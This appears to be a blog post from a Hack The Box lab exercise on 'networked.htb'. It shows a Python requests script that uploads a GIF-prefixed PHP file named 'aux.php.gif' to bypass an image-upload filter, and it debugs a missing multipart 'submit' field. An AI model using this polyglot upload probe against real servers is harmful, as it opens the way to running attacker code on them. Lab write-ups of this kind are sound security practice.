Python File Upload

2021-12-15  夙小叶
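import requests

# Upload endpoint, taken from the captured request below (Host: networked.htb, POST /upload.php)
url = "http://networked.htb/upload.php"


def upload_fileEx(filename: str) -> None:
    # files = { "myFile": (filename, open(EXPLOIT, "rb"), "image/png") }
    # Two multipart parts: the file itself, plus the form's "submit" field (no filename)
    files = [("myFile", (filename, r"GIF87a<?php echo(1); ?>", "image/gif")), ("submit", (None, "go!"))]
    # Send through a local intercepting proxy so the raw request can be inspected
    proxy = { "http": "http://127.0.0.1:8080" }

    r = requests.post(url, files=files, proxies=proxy)
    print(r.text)


if __name__ == '__main__':
    upload_fileEx("aux.php.gif")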

The target is just a very simple upload form:

<form action="/upload.php" method="post" enctype="multipart/form-data">
 <input type="file" name="myFile">
 <br>
<input type="submit" name="submit" value="go!">
</form>

This was the code I started with, and it failed:

files = { "myFile": (filename, r"GIF87a<?php echo(1); ?>", "image/gif") }
r = requests.post(url, files=files, proxies=proxy)

The request it sent:

POST /upload.php HTTP/1.1
Host: networked.htb
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 197
Content-Type: multipart/form-data; boundary=acba2ede0fd10bf0502358f99d6d20f3

--acba2ede0fd10bf0502358f99d6d20f3
Content-Disposition: form-data; name="myFile"; filename="aux.php.gif"
Content-Type: image/gif

GIF87a<?php echo(1); ?>
--acba2ede0fd10bf0502358f99d6d20f3--

Compare it with the request from a successful upload:

POST /upload.php HTTP/1.1
Host: networked.htb
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 287
Content-Type: multipart/form-data; boundary=20c3527f70dbcd8883630232a349fc35

--20c3527f70dbcd8883630232a349fc35
Content-Disposition: form-data; name="myFile"; filename="aux.php.gif"
Content-Type: image/gif

GIF87a<?php echo(1); ?>
--20c3527f70dbcd8883630232a349fc35
Content-Disposition: form-data; name="submit"

go!
--20c3527f70dbcd8883630232a349fc35--

The successful request actually carries one more form field:

Content-Disposition: form-data; name="submit"

go!
--20c3527f70dbcd8883630232a349fc35--

So two entries have to be passed in files: one is the file being uploaded, the other is a plain key-value pair.

files = [
    ("myFile", (filename, r"GIF87a<?php echo(1); ?>", "image/gif")), 
    ("submit", (None, "go!"))
]
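
Added example (not from the original post): the same difference can be seen without a proxy by preparing the request with requests, parsing the multipart body, and checking the field names against the form's inputs. The placeholder URL, the sample GIF part and the helper names are assumptions; the third call uses requests' `data=` argument, which goes beyond the fix shown above and produces the same `submit` part.

```python
import email
from html.parser import HTMLParser

import requests

URL = "http://example.invalid/upload.php"  # placeholder; the request is never sent
FORM_HTML = """<form action="/upload.php" method="post" enctype="multipart/form-data">
 <input type="file" name="myFile">
 <input type="submit" name="submit" value="go!">
</form>"""  # the form shown on this page
SAMPLE = ("sample.gif", b"GIF87a", "image/gif")  # constructed file part


class InputNames(HTMLParser):
    """Collect the name attribute of every <input> in the form."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        name = dict(attrs).get("name")
        if tag == "input" and name:
            self.names.append(name)


def form_fields(html):
    parser = InputNames()
    parser.feed(html)
    return parser.names


def sent_parts(files, data=None):
    """Prepare (but do not send) the POST; list (field name, filename) per part."""
    req = requests.Request("POST", URL, files=files, data=data).prepare()
    raw = b"Content-Type: " + req.headers["Content-Type"].encode() + b"\r\n\r\n" + req.body
    msg = email.message_from_bytes(raw)
    return [(p.get_param("name", header="content-disposition"), p.get_filename())
            for p in msg.get_payload()]


def missing_fields(files, data=None):
    """Form inputs that the prepared request would not submit."""
    sent = {name for name, _ in sent_parts(files, data)}
    return [f for f in form_fields(FORM_HTML) if f not in sent]


if __name__ == "__main__":
    print(missing_fields({"myFile": SAMPLE}))                               # first attempt
    print(missing_fields([("myFile", SAMPLE), ("submit", (None, "go!"))]))  # fix from the page
    print(missing_fields({"myFile": SAMPLE}, data={"submit": "go!"}))       # data= alternative
```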